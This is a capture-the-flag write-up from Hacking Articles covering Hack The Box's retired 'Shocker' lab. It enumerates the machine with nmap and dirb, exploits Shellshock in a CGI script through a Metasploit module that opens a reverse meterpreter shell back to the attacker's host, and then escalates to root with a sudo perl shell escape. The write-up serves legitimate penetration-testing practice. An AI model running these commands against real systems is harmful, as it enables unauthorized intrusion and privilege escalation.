Hello friends!! Today we are going to solve another CTF challenge “Shocker” which is lab presented by Hack the Box for making online penetration practices according to your experience level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab, therefore, we have chosen retried Shocker lab.
Task: find user.txt and root.txt file in victim’s machine.
Firstly let’s enumerate ports in context to identify running services and open ports of victim’s machine by using the most popular tool Nmap.
nmap -A 10.10.10.56
Awesome!! Nmap has done the remarkable job by dumping the details of services running on open port 80, 2222.
Knowing port 80 is open on victim’s network we preferred to explore his IP in the browser and the following image as shown below.
Next, we use the dirb tool of kali to enumerate the directories and found some important directories such as /cgi-bin ,index.html, server-status
As /cgi-bin / is a restricted directory, let’s look for a .sh file in the directory using dirb
dirb http://10.10.10.56/cgi-bin -X .sh
Great we have the user.sh in the cgi-bin directory.
We downloaded the user.sh by opening the URL http://10.10.10.56/cgi-bin/user.sh
Now let’s open the user.sh file using cat
If you will Google for Apache web server with URI of /cgi-bin/ then you will realize that it could be Shellshock vulnerability, therefore, let for its exploitation using Metasploit.
Open a terminal type msfconsole for loading metasploit framework and use following module. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition.
msf exploit(apache_mod_cgi_bash_env_exec) >set rhost 10.10.10.56
msf exploit(apache_mod_cgi_bash_env_exec) >set lhost 10.10.14.6
msf exploit(apache_mod_cgi_bash_env_exec) >set targeturi /cgi-bin/user.sh
msf exploit(apache_mod_cgi_bash_env_exec) >expoit
And we got victim’s reverse connection through meterpreter session 1 and hence our prediction is true the target was vulnerable to shellshock.
Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home directory and check available files and directories inside it.
Here one directory shelly, when I explore /shelly I saw user.txt and use cat command for reading.
Great!! Here we had completed 1st task now move to 2nd tasK
For accessing root directory we need root privilege therefore next we use python one-liner for spawning pty shell.
Great!! I logged in successfully and check shelly’s privileged and roles using sudo -l and found he has root privileged and an indication for a directory /usr/bin/perl with NOPASSWD. Now let’s get the root.txt by executing following command.
sudo perl –e ‘exec “/bin/sh”’
We have successfully completed 2nd task.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here